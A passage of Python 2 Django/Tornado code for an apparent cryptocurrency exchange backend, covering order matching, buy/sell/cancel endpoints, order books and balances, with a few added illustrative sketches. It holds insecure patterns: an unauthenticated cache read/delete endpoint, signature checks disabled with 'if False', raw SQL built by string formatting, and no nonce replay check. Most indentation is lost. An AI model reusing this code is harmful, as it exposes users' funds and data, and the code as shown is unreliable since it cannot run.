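# --- illustrative sketch (not from the original source) ----------------------
# Typical bootstrap, assuming the caller supplies a port and a tornado handler
# list (the values below are placeholders):
def _demo_bootstrap(port=8888):
    server = TornadoServer.create_instance(port, [(r"/stop", StopHandler)], False)
    server.start()  # blocks inside tornado's IOLoop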
def put2queue(some_object):
backend = TornadoServer.get_instance()
try:
backend.queue1.put(copy.deepcopy(some_object), False)
return True
except Queue.Full:
logger_application.error("="*60)
logger_application.error("WARNING")
logger_application.error("so sad there is not avalible slot")
return False
except:
        logger_application.critical(traceback.format_exc())
        return False
class StopHandler(tornado.web.RequestHandler):
def get(self):
logger_application.info("stoping tornado")
tornado.ioloop.IOLoop.instance().stop()
# user_id = models.IntegerField()
# type_deal = models.CharField(max_length=40, choices=TYPE, default='buy', verbose_name=u"Type")
# user = models.CharField(max_length=255, verbose_name=u"Username")
# price = models.DecimalField(max_digits=20, blank=True,
#                             decimal_places=10, verbose_name=u"price")
# amnt_base = models.DecimalField(max_digits=20, blank=True,
#                                 decimal_places=10, verbose_name=u"amount in the base currency")
# amnt_trade = models.DecimalField(max_digits=20, blank=True,
#                                  decimal_places=10, verbose_name=u"amount in the traded currency")
# pub_date = models.DateTimeField(auto_now=True, verbose_name=u"Date")
# trade_pair = models.IntegerField(verbose_name=u"Trade pair")
# transaction from the deals to
def cache_control(Req):
do = Req.REQUEST.get("do", None)
cache = caching()
if do == "flush":
return json_false500(Req)
if do == "get":
key = Req.REQUEST.get("key")
return HttpResponse(str(cache.get(key,"")))
if do == "del":
key = Req.REQUEST.get("key")
value = str(cache.get(key,""))
cache.delete(key)
return HttpResponse(value)
return json_false500(Req)
def canceled_orders2deals(Order2Remove):
(amnt_base, amnt_trade) = (0, 0)
if (Order2Remove.sum1_history - Order2Remove.sum1)>0:
if Order2Remove.type_deal == "sell" :
amnt_base = (Order2Remove.sum1_history - Order2Remove.sum1 )* Order2Remove.price
amnt_trade = Order2Remove.sum1_history - Order2Remove.sum1
if Order2Remove.type_deal == "buy":
amnt_base = Order2Remove.sum1_history - Order2Remove.sum1
amnt_trade = (Order2Remove.sum1_history - Order2Remove.sum1)/Order2Remove.price
user = User.objects.get(id = Order2Remove.user)
deal = DealsMemory(type_deal = Order2Remove.type_deal,
user = user.username,
user_id = Order2Remove.user,
price = Order2Remove.price,
amnt_base = amnt_base,
amnt_trade = amnt_trade,
trade_pair = Order2Remove.trade_pair)
deal.save()
def processed_orders2deals():
logger_application.info("cache deals")
for item in OrdersMem.objects.filter(status="processed"):
(amnt_base, amnt_trade) = (0,0)
if item.type_deal == "sell" :
amnt_base = item.sum1_history * item.price
amnt_trade = item.sum1_history
if item.type_deal == "buy":
amnt_base = item.sum1_history
amnt_trade = item.sum1_history/item.price
if item.type_deal == "transfer":
item.archive()
continue
user = User.objects.get(id = item.user)
deal = DealsMemory(type_deal = item.type_deal,
user = user.username,
user_id = item.user,
price = item.price,
amnt_base = amnt_base,
amnt_trade = amnt_trade,
trade_pair = item.trade_pair)
deal.save()
item.archive()
item.delete()
def process_queue(q, read_count, function_to_process=None):
logger_application.info("process inner queue")
    for i in xrange(read_count):
try:
item = q.get(False)
if function_to_process:
function_to_process(item)
q.task_done()
except Queue.Empty:
return True
except:
logger_application.critical("something wrong with process queue \n" + traceback.format_exc() )
def my_async(func2decorate):
def wrapper(*args, **kwards):
callable_object = lambda: func2decorate(*args, **kwards)
threading.Thread(target=callable_object).start()
return True
return wrapper
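# --- illustrative sketch (not from the original source) ----------------------
# Any callable wrapped with @my_async returns True immediately and does its real
# work in a background thread; the function below is purely illustrative.
@my_async
def _demo_background_log(message):
    logger_application.info("background: %s" % message)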
def deposit_funds(Order, currency1):
return _(u"Deposit funds %(sum)s %(currency)s according with order #%(order_id)i " % {
'sum': Order.sum1_history,
'currency': currency1.title,
'order_id': Order.id})
def order_canceled(Order):
return _(u"You order #%(order_id)i is canceled" % {'order_id': int(Order)})
def order_finish(Order):
return _(u"You order #%(order_id)i is fully completed" % {'order_id': Order.id})
def order_return_unused(Order, Currency1, AccumSumToSell):
return _(u"Return %(sum).8f %(currency)s unused funds according with order #%(order_id)i " %
{'sum': AccumSumToSell,
'currency': str(Currency1),
'order_id': Order.id})
def order_description_buy(Sum1, Sum2, Order, BackOrder, TradePair):
Price = BackOrder.price
return _("Buying %(sum).8f %(currency)s according with order #%(order_id)i, price %(price).8f total sum %(total).8f" %
{'sum': Sum1,
'currency': str(TradePair.currency_on),
'order_id': BackOrder.id,
'price': Price,
'total': Sum2
})
def order_description_sell(Sum1, Sum2, Order, BackOrder, TradePair):
Price = Order.price
return _("Selling %(sum).8f %(currency)s according with order #%(order_id)i, price %(price).8f total sum %(total).8f " %
{'sum': Sum1,
'currency': str(TradePair.currency_on),
'order_id': Order.id,
'price': Price,
'total': Sum2
})
# Process one order item that matches the source order.
# Example: AccumSumToSell => 7000 UAH; OrderBuy is an order to buy BTC (sum1 is, for example, 1 BTC);
# OrderSell is the order selling 7000 UAH.
# OrderSell is the source order, AccountSeller is the source account.
def process_order_buy(AccountSeller, AccumSumToSell, OrderBuy, OrderSell, TradePair):
## TODO move to settings for every user
logger_application.info("="*120)
logger_application.info(OrderSell)
logger_application.info("="*120)
logger_application.info(AccountSeller)
logger_application.info("buy %s " % (AccumSumToSell))
logger_application.info(OrderBuy)
logger_application.info("="*120)
# TODO add salt verify, notify me
if False and not OrderBuy.verify(str(OrderBuy.user)):
logger_application.critical("Sign FAILED %s" % str(OrderBuy))
return AccumSumToSell
# OrderBuy.sum1*OrderBuy.price
# 1.9 *7000 = 13000 UAH
# OrderBuySum UAH for BTC
OrderBuySum = OrderBuy.sum1*OrderBuy.price
if OrderBuySum > AccumSumToSell:
logger_application.info("buy case 1")
## a danger of low overflow
TransSum = AccumSumToSell/OrderBuy.price
AccountBuyer = get_account(user_id=OrderBuy.user, currency_id=OrderSell.currency1)
##comission
trans1 = add_trans2(AccountBuyer,
AccumSumToSell*-1,
OrderSell.currency1,
OrderSell,
"deal",
True,
OrderBuy.comission)
trans2 = add_trans2(AccountSeller,
TransSum*-1,
OrderBuy.currency1,
OrderBuy,
"deal",
True,
OrderSell.comission)
# TODO move to queue
try:
put2queue(('deal', trans1, TradePair, OrderBuy))
put2queue(('deal', trans2, TradePair, OrderSell))
system_notify_async(order_description_sell(TransSum, OrderBuySum, OrderBuy, OrderSell, TradePair),
AccountBuyer.get_user())
system_notify_async(order_description_buy(TransSum, OrderBuySum, OrderBuy, OrderSell, TradePair),
AccountSeller.get_user())
except:
logger_application.critical("something gooing wrong with notification" + traceback.format_exc())
pass
return 0
if OrderBuySum <= AccumSumToSell:
logger_application.info("buy case 2")
TransSum = OrderBuy.sum1
AccountBuyer = get_account(user_id=OrderBuy.user, currency_id=OrderSell.currency1)
##comission
trans1 = add_trans2(AccountBuyer,
OrderBuySum*-1,
OrderSell.currency1,
OrderSell,
"deal",
True,
OrderBuy.comission)
trans2 = add_trans2(AccountSeller,
TransSum*-1,
OrderBuy.currency1,
OrderBuy,
"deal",
True,
OrderSell.comission)
# TODO move to queue
try:
put2queue(('deal', trans1, TradePair, OrderBuy))
put2queue(('deal', trans2, TradePair, OrderSell))
system_notify_async(order_description_sell(TransSum, OrderBuySum, OrderBuy, OrderSell, TradePair),
AccountBuyer.get_user())
system_notify_async(order_description_buy(TransSum, OrderBuySum, OrderBuy, OrderSell, TradePair),
AccountSeller.get_user())
system_notify_async(order_finish(OrderBuy), AccountBuyer.get_user())
except:
logger_application.critical("somthing gooing wrong with notification" + traceback.format_exc())
pass
OrderBuy.make2processed()
return AccumSumToSell-OrderBuySum
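# --- illustrative sketch (not from the original source) ----------------------
# The matching arithmetic above, stripped of accounts and transactions: a buy
# order for buy_sum1 units at buy_price absorbs buy_sum1 * buy_price of the base
# currency; whatever remains of the seller's sum is returned to the caller.
def _demo_match_buy(accum_sum_to_sell, buy_sum1, buy_price):
    order_buy_sum = buy_sum1 * buy_price      # base currency the buyer still needs
    if order_buy_sum > accum_sum_to_sell:     # case 1: the buy order outlives the sell order
        return 0
    return accum_sum_to_sell - order_buy_sum  # case 2: the sell order has a remainder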
# Process one order item that matches the source order.
# Example: AccumSumToSell => 1 BTC; OrderBuy holds, for example, 7000 UAH to buy BTC; OrderSell is selling 1 BTC.
def process_order_sell(AccountSeller, AccumSumToSell, OrderBuy, OrderSell, TradePair):
## TODO move to settings for every user
logger_application.info("=========================================================================================")
logger_application.info(OrderSell)
logger_application.info(AccountSeller)
logger_application.info("sell %s" % (AccumSumToSell))
logger_application.info(OrderBuy)
logger_application.info("=========================================================================================")
# TODO add salt verify, notify me
if False and not OrderBuy.verify(str(OrderBuy.user)):
logger_application.info("Sign FAILED %s" % str(OrderBuy))
return AccumSumToSell
# 7000/3600 = 1.9 BTC
OrderBuySum = OrderBuy.sum1/OrderSell.price
if OrderBuySum > AccumSumToSell:
## a danger of low overflow
logger_application.info("sell case 1")
TransSum = AccumSumToSell*OrderSell.price
AccountBuyer = get_account(user_id=OrderBuy.user, currency_id=OrderSell.currency1)
##comission
trans1 = add_trans2(AccountBuyer,
AccumSumToSell*-1,
OrderSell.currency1,
OrderSell,
"deal",
True,
OrderBuy.comission)
trans2 = add_trans2(AccountSeller,
TransSum*-1,
OrderBuy.currency1,
OrderBuy,
"deal",
True,
OrderSell.comission)
# TODO move to queue
try:
put2queue(('deal', trans1, TradePair, OrderSell))
put2queue(('deal', trans2, TradePair, OrderBuy))
system_notify_async(order_description_sell(AccumSumToSell, TransSum, OrderSell, OrderBuy, TradePair),
AccountSeller.get_user())
system_notify_async(order_description_buy(AccumSumToSell, TransSum, OrderSell, OrderBuy, TradePair),
AccountBuyer.get_user())
except:
logger_application.critical("something gooing wrong with notification" + traceback.format_exc())
pass
return 0
if OrderBuySum <= AccumSumToSell:
logger_application.info("sell case 2")
TransSum = OrderBuy.sum1
AccountBuyer = get_account(user_id=OrderBuy.user, currency_id=OrderSell.currency1)
##comission
trans1 = add_trans2(AccountBuyer,
OrderBuySum*-1,
OrderSell.currency1,
OrderSell,
"deal",
True,
OrderSell.comission)
trans2 = add_trans2(AccountSeller,
TransSum*-1,
OrderBuy.currency1,
OrderBuy,
"deal",
True,
OrderBuy.comission)
# TODO move to queue
try:
put2queue(('deal', trans1, TradePair, OrderSell))
put2queue(('deal', trans2, TradePair, OrderBuy))
system_notify_async(order_description_sell(OrderBuySum, TransSum, OrderSell, OrderBuy, TradePair), AccountSeller.get_user())
system_notify_async(order_description_buy(OrderBuySum, TransSum, OrderSell, OrderBuy, TradePair), AccountBuyer.get_user())
system_notify_async(order_finish(OrderBuy), AccountBuyer.get_user())
except:
logger_application.critical("somthing gooing wrong with notification" + traceback.format_exc())
pass
OrderBuy.make2processed()
return AccumSumToSell - OrderBuySum
def admin_system_notify_async(cortage):
pass
def auth(Req):
Nonce = Req.REQUEST.get("nonce", None)
if Nonce is None:
return json_false500(Req)
Sign = Req.META.get('HTTP_API_SIGN', None)
if Sign is None:
return json_false500(Req, {"description": "invalid_params", "key": "api_sign"})
PublicKey = Req.META.get('HTTP_PUBLIC_KEY', None)
if PublicKey is None:
return json_false500(Req, {"description": "invalid_params", "key": "public_key"})
try:
Req.user = check_api_sign(PublicKey, Sign, Req.body)
Cache = caching()
Cache.set("nonce_" + PublicKey, int(Nonce), 50000)
Nonce = Cache.get("nonce_" + PublicKey)
return json_true(Req, {"nonce": Nonce, "public_key": PublicKey})
except:
logger_application.critical(traceback.format_exc())
return json_false500(Req, {"description": "auth_faild"})
def make_auto_trade(OrderSell, TradePair, Price, Currency1, Sum1, Currency2):
# if we sell
# Query = "SELECT * FROM main_ordersmem WHERE trade_pair_id=%i" % (TradePair.id)
logger_application.info("="*300)
logger_application.info("call order")
logger_application.info(OrderSell)
if int(TradePair.currency_on.id) == int(Currency1.id):
Query = "SELECT * FROM main_ordersmem WHERE currency1=%i AND trade_pair=%i \
AND status='processing' AND price >= %s \
AND user!=%i ORDER BY price DESC, id DESC" % (Currency2.id,
TradePair.id,
format_numbers_strong(Price), OrderSell.user)
else:
Query = "SELECT * FROM main_ordersmem WHERE currency1=%i AND trade_pair=%i \
AND status='processing' AND price <= %s \
AND user!=%i ORDER BY price, id DESC " % (Currency2.id,
TradePair.id,
format_numbers_strong(Price), OrderSell.user )
List = OrdersMem.objects.raw(Query)
# ##work on first case
AccumSumToSell = Sum1
AccountBuyer = get_account(user_id=OrderSell.user, currency_id=Currency2.id)
UserDeals = [int(OrderSell.user)]
process_order = None
    if TradePair.currency_on.id == Currency1.id:
        process_order = process_order_sell
    else:
        process_order = process_order_buy
# TODO in case of exception block OrderSell and OrderBuy and interrupt the cycle
for OrderBuy in List:
UserDeals.append(int(OrderBuy.user))
try :
AccumSumToSell = process_order(AccountBuyer, AccumSumToSell, OrderBuy, OrderSell, TradePair)
except TransError as e:
logger_application.critical(traceback.format_exc())
OrderBuy.status = "core_error"
OrderSell.status = "core_error"
OrderBuy.save()
OrderSell.save()
admin_system_notify_async((OrderBuy, OrderSell))
ResultSum = finish_create_order(TradePair, AccumSumToSell, OrderSell)
return {"start_sum": Sum1, "status":False, "last_sum": ResultSum, "users_bothered": UserDeals}
if AccumSumToSell > 0.00000001:
continue
else:
break
logger_application.info("="*300)
logger_application.info(AccumSumToSell)
ResultSum = finish_create_order(TradePair, AccumSumToSell, OrderSell)
OrderSell.sum1 = AccumSumToSell
# comission operation
if ResultSum < 0.00000001 and ResultSum>=0:
#if ResultSum != 0:
# return_rest2acc(OrderSell, AccumSumToSell, Currency1)
OrderSell.sum1 = 0
OrderSell.make2processed()
else:
OrderSell.save()
return {"start_sum": Sum1, "status":True, "last_sum": ResultSum, "users_bothered": UserDeals}
@my_async
def system_notify_async(Msg, User):
system_notify(Msg, User)
def finish_create_order(TradePair, AccumSumToSell, Order):
##base currency
if Order.currency1 == TradePair.currency_on.id:
if AccumSumToSell < TradePair.min_trade_base:
system_notify_async(order_finish(Order), Order.user)
return 0
else:
return AccumSumToSell
else:
SumToBuy = AccumSumToSell/Order.price
if SumToBuy < TradePair.min_trade_base:
system_notify_async(order_finish(Order), Order.user)
return 0
else:
return AccumSumToSell
@my_async
def reload_cache(Res, Type):
cache = caching()
DeleteKeys = []
for i in Res["users_bothered"]:
CachedKey1 = 'client_orders_' + str(i) + "_" + Type
CachedKey2 = 'balance_' + str(i)
DeleteKeys.append(CachedKey1)
DeleteKeys.append(CachedKey2)
# deal_list_btc_uah
DeleteKeys.append("sell_list_" + Type)
DeleteKeys.append("buy_list_" + Type)
logger_application.info("delete this keys %s " % str(DeleteKeys))
cache.delete_many(DeleteKeys)
def process_auto(Res, TradePair, Dict = None):
Encoder = json.JSONEncoder()
if Res["status"]:
if Res["start_sum"] == Res["last_sum"]:
Dict = {"status": True, "description": _("The order has been created")}
elif Res["last_sum"] == 0:
Dict = {"status": "processed",
"description": _("Your order has been fully processed successfully"),
"start_sum_to_buy": str(Res["start_sum"]),
"last_sum_to_buy": str(Res["last_sum"])
}
elif Res["start_sum"] > Res["last_sum"]:
Dict = {"status": "processed", "description": _("Your order has been processed partial"),
"start_sum_to_buy": str(Res["start_sum"]),
"last_sum_to_buy": str(Res["last_sum"])
}
else:
Dict = {"status": "process_order_error", "description": _("The mistake has been occurred during"
" creation of the order,"
" and developers were notified about it")}
Type = TradePair.url_title
reload_cache(Res, Type)
return Encoder.encode(Dict)
def process_mistake(Req, Mistake):
Dict = None
Encoder = json.JSONEncoder()
if Mistake == 'incifition_funds':
Dict = {"status": Mistake, "description": _(u"У вас недостаточно средств для этой операции,"
u" пополните ваш счет во вкладке "
u"<a href='/finance'> \"финансы\" </a> ")}
elif Mistake == "MinCount":
Dict = {"status": Mistake, "description": _("Count of deal is too small")}
elif Mistake == "invalid_params":
Dict = {"status": Mistake, "description": _("Invalid params")}
else:
Dict = {"status": Mistake, "description": _("Some mistake has been occured, "
"try later, or call support")}
return Encoder.encode(Dict)
@my_cache()
def market_prices(Req):
Dict = None
Encoder = json.JSONEncoder()
prices = []
for item in TradePairs.objects.filter(status="processing").order_by("ordering"):
TopName = item.url_title + "_top_price"
Price = VolatileConsts.objects.get(Name=TopName)
prices.append({"type": TopName, "price": Price.Value})
RespJ = Encoder.encode({"prices": prices})
return RespJ
@json_auth_required
def remove_order(Req, Order):
Encoder = json.JSONEncoder()
FreqKey = "orders" + str(Req.user)
#if not check_freq(FreqKey, 3):
# Response = HttpResponse('{"status":false, "description":"frequancy limit"}')
# Response['Content-Type'] = 'application/json'
# return Response
if __inner_remove_order(Order, Req.user):
system_notify_async(order_canceled(Order), Req.user)
Dict = {"status": True}
RespJ = Encoder.encode(Dict)
Response = HttpResponse(RespJ)
Response['Content-Type'] = 'application/json'
return Response
else:
Dict = {"status": False, "description": _("A mistake has been occured during removing try one more")}
RespJ = Encoder.encode(Dict)
Response = HttpResponse(RespJ)
Response['Content-Type'] = 'application/json'
return Response
def __inner_remove_order(Order, User):
Order2Remove = OrdersMem.objects.get(user=User, id=int(Order), status="processing")
#if not Order2Remove.verify(str(User)) :
# return False
Market = TradePairs.objects.get(id=Order2Remove.trade_pair)
Order2Remove.status = "canceled"
Order2Remove.save()
Title = Market.url_title
LOCK = "trades" + Title
TradeLock = my_lock(LOCK)
#try:
Account = get_account(user_id=User, currency_id=Order2Remove.currency1)
cache = caching()
canceled_orders2deals(Order2Remove)
trans = add_trans2(Account,
-1*Order2Remove.sum1,
Order2Remove.currency1,
Order2Remove,
"order_cancel")
put2queue(('order_cancel', trans, Market, Order2Remove))
Order2Remove.archive()
Order2Remove.delete()
cache.delete_many(["buy_list_" + Title,
"sell_list_" + Title,
"balance_" + str(User),
'client_orders_' + str(User) + "_" + Title])
my_release(TradeLock)
return True
#except:
#my_release(TradeLock)
#return False
@json_auth_required
def sell(Req, Trade_pair):
FreqKey = "orders" + str(Req.user)
Start = time.time()
if not check_freq(FreqKey, 3):
Response = HttpResponse('{"status":false, "description":"frequancy limit"}')
Response['Content-Type'] = 'application/json'
return Response
getcontext().prec = settings.TRANS_PREC
try:
Count = Req.REQUEST.get("count")
Price = Req.REQUEST.get("price")
Count = Decimal(Count.replace(",", ".").strip())
Price = Decimal(Price.replace(",", ".").strip())
Count = to_prec(Count, settings.TRANS_PREC)
Price = to_prec(Price, settings.TRANS_PREC)
except:
Response = HttpResponse(process_mistake(Req, "invalid_params"))
Response['Content-Type'] = 'application/json'
return Response
if Price <= 0:
Response = HttpResponse(process_mistake(Req, "SumLess0"))
Response['Content-Type'] = 'application/json'
return Response
if Count <= 0:
Response = HttpResponse(process_mistake(Req, "CountLess0"))
Response['Content-Type'] = 'application/json'
return Response
TradePair = TradePairs.objects.get(url_title=Trade_pair)
LOCK = "trades" + TradePair.url_title
if TradePair.min_trade_base > Count:
Response = HttpResponse(process_mistake(Req, "MinCount"))
Response['Content-Type'] = 'application/json'
return Response
Custom = "0.0005" # Req.session["deal_comission"]
Comission = Decimal(Custom)
CurrencyOnS = Req.REQUEST.get("currency")
CurrencyBaseS = Req.REQUEST.get("currency1")
Amnt1 = Count
Amnt2 = Count * Price
CurrencyBase = Currency.objects.get(title=CurrencyBaseS)
CurrencyOn = Currency.objects.get(title=CurrencyOnS)
TradeLock = my_lock(LOCK)
order = OrdersMem(user=Req.user,
currency1=CurrencyOn.id,
sum1_history=Amnt1,
price=Price,
pub_date = datetime.now(),
sum1=Decimal("0.0"),
trade_pair=TradePair.id,
currency2 = CurrencyBase.id,
comission=Comission,
status="created",
type_deal = "sell")
order.save()
i = order.id
backend = TornadoServer.get_instance()
try:
FromAccount = get_account(user_id=Req.user, currency_id=CurrencyOn.id)
system_notify_async(deposit_funds(order, CurrencyOn), Req.user)
trans_deposit = add_trans2(FromAccount, Amnt1, CurrencyOn.id, order, "deposit")
put2queue(('deposit', trans_deposit, TradePair, order))
order = trans_deposit.order
order.status='processing'
order.save()
ResAuto = make_auto_trade(order, TradePair, order.price, CurrencyOn, Amnt1, CurrencyBase)
# adding locks
my_release(TradeLock)
logger_application.info("reees auto")
logger_application.info(ResAuto)
resp_body = process_auto(ResAuto, TradePair)
Response = HttpResponse(resp_body)
Response['Content-Type'] = 'application/json'
End = time.time()
measure = OrderTimer(order=i, time_work=str(End - Start), error="")
measure.save()
return Response
except Exception as e :
logger_application.critical(traceback.format_exc())
order.status = "canceled"
order.save()
Status = "unrecognized"
my_release(TradeLock)
Response = HttpResponse(process_mistake(Req, Status))
Response['Content-Type'] = 'application/json'
End = time.time()
tb = traceback.format_exc()
measure = OrderTimer(order=i, time_work=str(End - Start), error=tb)
measure.save()
return Response
@json_auth_required
def buy(Req, Trade_pair):
FreqKey = "orders" + str(Req.user)
Start = time.time()
if not check_freq(FreqKey, 3):
Response = HttpResponse('{"status":false, "description":"frequancy limit"}')
Response['Content-Type'] = 'application/json'
return Response
getcontext().prec = settings.TRANS_PREC
try:
Count = Req.REQUEST.get("count")
Price = Req.REQUEST.get("price")
Count = Decimal(Count.replace(",", ".").strip())
Price = Decimal(Price.replace(",", ".").strip())
Count = to_prec(Count, settings.TRANS_PREC)
Price = to_prec(Price, settings.TRANS_PREC)
except:
logger_application.error(traceback.format_exc())
Response = HttpResponse(process_mistake(Req, "invalid_params"))
Response['Content-Type'] = 'application/json'
return Response
if Price <= 0:
Response = HttpResponse(process_mistake(Req, "SumLess0"))
Response['Content-Type'] = 'application/json'
return Response
if Count <= 0:
Response = HttpResponse(process_mistake(Req, "CountLess0"))
Response['Content-Type'] = 'application/json'
return Response
TradePair = TradePairs.objects.get(url_title=Trade_pair)
LOCK = "trades" + TradePair.url_title
if TradePair.min_trade_base > Count:
Response = HttpResponse(process_mistake(Req, "MinCount"))
Response['Content-Type'] = 'application/json'
return Response
Custom = "0.0005" # Req.session["deal_comission"]
Comission = Decimal(Custom)
CurrencyOnS = Req.REQUEST.get("currency")
CurrencyBaseS = Req.REQUEST.get("currency1")
Amnt1 = Price * Count
Amnt2 = Count
CurrencyBase = Currency.objects.get(title=CurrencyBaseS)
CurrencyOn = Currency.objects.get(title=CurrencyOnS)
TradeLock = my_lock(LOCK)
order = OrdersMem(user=Req.user,
currency1=CurrencyBase.id,
currency2=CurrencyOn.id,
sum1_history=Amnt1,
price=Price,
pub_date=datetime.now(),
sum1=Decimal("0.0"),
trade_pair=TradePair.id,
comission=Comission,
status="created",
type_deal = "buy"
)
order.save()
i = order.id
try:
FromAccount = get_account(user_id=Req.user, currency_id=CurrencyBase.id)
system_notify_async(deposit_funds(order, CurrencyBase), Req.user)
# TODO Order to Encrypted object
trans_deposit = add_trans2(FromAccount, Amnt1, CurrencyBase.id, order, "deposit")
put2queue(('deposit', trans_deposit, TradePair, order))
order = trans_deposit.order
order.status = "processing"
order.save()
ResAuto = make_auto_trade(order, TradePair, order.price, CurrencyBase, Amnt1, CurrencyOn)
Response = HttpResponse(process_auto(ResAuto, TradePair))
my_release(TradeLock)
Response['Content-Type'] = 'application/json'
End = time.time()
measure = OrderTimer(order=i, time_work=str(End - Start), error="")
measure.save()
return Response
except Exception as e:
logger_application.info(traceback.format_exc())
order.status = "canceled"
order.save()
Status = "unrecognized"
Response = HttpResponse(process_mistake(Req, Status))
Response['Content-Type'] = 'application/json'
my_release(TradeLock)
End = time.time()
tb = traceback.format_exc()
measure = OrderTimer(order=i, time_work=str(End - Start), error=tb)
measure.save()
return Response
@json_auth_required
def bid(Req, UrlTitle):
CurrentTradePair = TradePairs.objects.get(url_title=UrlTitle)
SumList = []
Amount = Decimal("0")
TempSum = Decimal('0')
try:
Amount = Decimal(Req.REQUEST.get("amount", None))
Query = "SELECT * FROM main_ordersmem WHERE currency2=%i AND currency1=%i \
AND status='processing' \
AND user!=%i ORDER BY price DESC" % (
CurrentTradePair.currency_on.id,
CurrentTradePair.currency_from.id,
Req.user)
List = OrdersMem.objects.raw(Query)
for item in List:
if Amount > item.sum1:
Amount -= item.sum1
TempSum += item.sum1
SumList.append({"sum": item.sum1, "price": item.price})
else:
TempSum += Amount
SumList.append({"sum": Amount, "price": item.price})
break
except:
logger_application.info(traceback.format_exc())
Response = HttpResponse('{"status":false, "description":"amount is incorrect"}')
Response['Content-Type'] = 'application/json'
return Response
# format_numbers_strong(balance_buy.balance )
AvaragePrice = Decimal("0")
BuySum = Decimal("0")
for item in SumList:
BuySum += item['sum']
AvaragePrice += ((item['sum'] / TempSum) * item['price'] )
Dict = {"sell_sum": format_numbers_strong(BuySum),
"price": format_numbers_strong(AvaragePrice),
"status": True}
RespJ = json.JSONEncoder().encode(Dict)
return cached_json_object(RespJ)
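# --- illustrative sketch (not from the original source) ----------------------
# The quote computed above is a volume-weighted average price over the matched
# slices: VWAP = sum(slice_sum_i * price_i) / sum(slice_sum_i).
def _demo_vwap(slices):
    """slices: iterable of (sum, price) Decimal pairs."""
    total = sum(s for s, _ in slices)
    if not total:
        return Decimal("0")
    return sum(s * p for s, p in slices) / total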
@json_auth_required
def ask(Req, UrlTitle):
CurrentTradePair = TradePairs.objects.get(url_title=UrlTitle)
SumList = []
Amount = Decimal("0")
TempSum = Decimal('0')
try:
Amount = Decimal(Req.REQUEST.get("amount", None))
Query = "SELECT * FROM main_ordersmem WHERE currency1=%i AND currency2=%i \
AND status='processing' \
AND user!=%i ORDER BY price DESC" % (
CurrentTradePair.currency_on.id,
CurrentTradePair.currency_from.id,
Req.user)
List = OrdersMem.objects.raw(Query)
for item in List:
if Amount > item.sum1:
Amount -= item.sum1
TempSum += item.sum1
SumList.append({"sum": item.sum1, "price": item.price})
else:
TempSum += Amount
SumList.append({"sum": Amount, "price": item.price})
break
except:
logger_application.info(traceback.format_exc())
Response = HttpResponse('{"status":false, "description":"amount is incorrect"}')
Response['Content-Type'] = 'application/json'
return Response
# format_numbers_strong(balance_buy.balance )
AvaragePrice = Decimal("0")
BuySum = Decimal("0")
for item in SumList:
BuySum += item['sum']
AvaragePrice += ((item['sum'] / TempSum) * item['price'] )
Dict = {"buy_sum": format_numbers_strong(BuySum),
"price": format_numbers_strong(AvaragePrice),
"status": True}
RespJ = json.JSONEncoder().encode(Dict)
return cached_json_object(RespJ)
@my_cache()
def buy_list(Req, Pair):
Current = None
try:
Current = TradePairs.objects.get(url_title=Pair)
except:
logger_application.info(traceback.format_exc())
return json_false500(Req)
BuyList = OrdersMem.objects.filter(status="processing",
currency1=Current.currency_from.id,
currency2=Current.currency_on.id)
getcontext().prec = settings.TRANS_PREC
Currency1Title = Current.currency_from.title
Currency2Title = Current.currency_on.title
List1 = {}
AccumBuySum = 0
for item in BuyList:
SellSum = item.sum1 ## UAH
BuySum = item.sum1/item.price ## LTC
Rate = item.price
AccumBuySum += SellSum
if List1.has_key(Rate):
List1[Rate][Currency1Title] = List1[Rate][Currency1Title] + SellSum
List1[Rate][Currency2Title] = List1[Rate][Currency2Title] + BuySum
else:
List1[Rate] = {Currency1Title: SellSum, Currency2Title: BuySum}
ResBuyList = []
LL = List1.keys()
L = []
for i in LL:
Temp = Decimal(i)
List1[Temp] = List1[i]
L.append(Temp)
L.sort()
L.reverse()
Price = 0
MaxPrice = 0
for i in L:
Price = format_numbers10(i)
ResBuyList.append({"price": Price,
"currency_trade": format_numbers10(List1[i][Currency2Title]),
"currency_base": format_numbers10(List1[i][Currency1Title])})
if len(ResBuyList):
MaxPrice = ResBuyList[0]["price"]
Dict = {"orders_sum": format_numbers10(AccumBuySum), "list": ResBuyList,
"max_price": MaxPrice, "min_price": Price}
RespJ = json.JSONEncoder().encode(Dict)
return RespJ
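# --- illustrative sketch (not from the original source) ----------------------
# buy_list()/sell_list() aggregate open orders per price level; the same idea on
# plain (price, amount) pairs:
def _demo_group_by_price(orders):
    """orders: iterable of (price, amount) tuples -> {price: total_amount}."""
    book = {}
    for price, amount in orders:
        book[price] = book.get(price, 0) + amount
    return book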
@json_auth_required
def order_status(Req, Id):
Dict = {}
try:
order = Orders.objects.get(id=int(Id), user=Req.user)
Dict["pub_date"] = str(order.pub_date)
Dict["sum1"] = str(order.sum1)
Dict["id"] = str(Id)
Dict["sum2"] = str(order.sum2)
Dict["sum1_history"] = str(order.sum1_history)
Dict["sum2_history"] = str(order.sum2_history)
Dict["currency1"] = order.currency1.title
Dict["currency2"] = order.currency1.title
Dict["status"] = order.status
except Orders.DoesNotExist:
logger_application.error(traceback.format_exc())
return status_false()
Response = HttpResponse(json.JSONEncoder().encode(Dict))
Response['Content-Type'] = 'application/json'
return Response
@my_cache()
def balance(Req, User_id):
List = []
Dict = {}
for i in Accounts.objects.filter(user_id=User_id):
acc = get_account(user_id=User_id, currency_id=i.currency.id)
List.append({"balance": format_numbers10(acc.get_balance), "currency": i.currency.title})
User = Req.user
Dict["notify_count"] = Msg.objects.filter(user_to=User,
user_from_id=1,
user_hide_to="false",
user_seen_to="false").count()
Dict["msg_count"] = Msg.objects.filter(user_to=User,
user_hide_to="false",
user_seen_to="false").exclude(user_from_id=1).count()
try:
online = OnlineUsers(user_id=Req.user)
online.save()
except:
online = OnlineUsers.objects.get(user_id=Req.user)
online.pub_date = datetime.now()
online.save()
if Req.session.has_key('use_f2a'):
Dict["use_f2a"] = Req.session['use_f2a']
else:
Dict["use_f2a"] = False
Dict["accounts"] = List
RespJ = json.JSONEncoder().encode(Dict)
return RespJ
@json_auth_required
def user_balance(Req):
return balance(Req, Req.user)
# Dict["accounts"] = []
# Response = HttpResponse( json.JSONEncoder().encode(Dict) )
# Response['Content-Type'] = 'application/json'
# return Response
@my_cache()
def sell_list(Req, Pair):
Current = None
try:
Current = TradePairs.objects.get(url_title=Pair)
except:
return json_false500(Req)
SellList = OrdersMem.objects.filter(status="processing",
currency1=Current.currency_on.id,
currency2=Current.currency_from.id)
getcontext().prec = 8
Currency1Title = Current.currency_from.title
Currency2Title = Current.currency_on.title
AccumSellSum = 0
GroupSellDict = {}
for item in SellList:
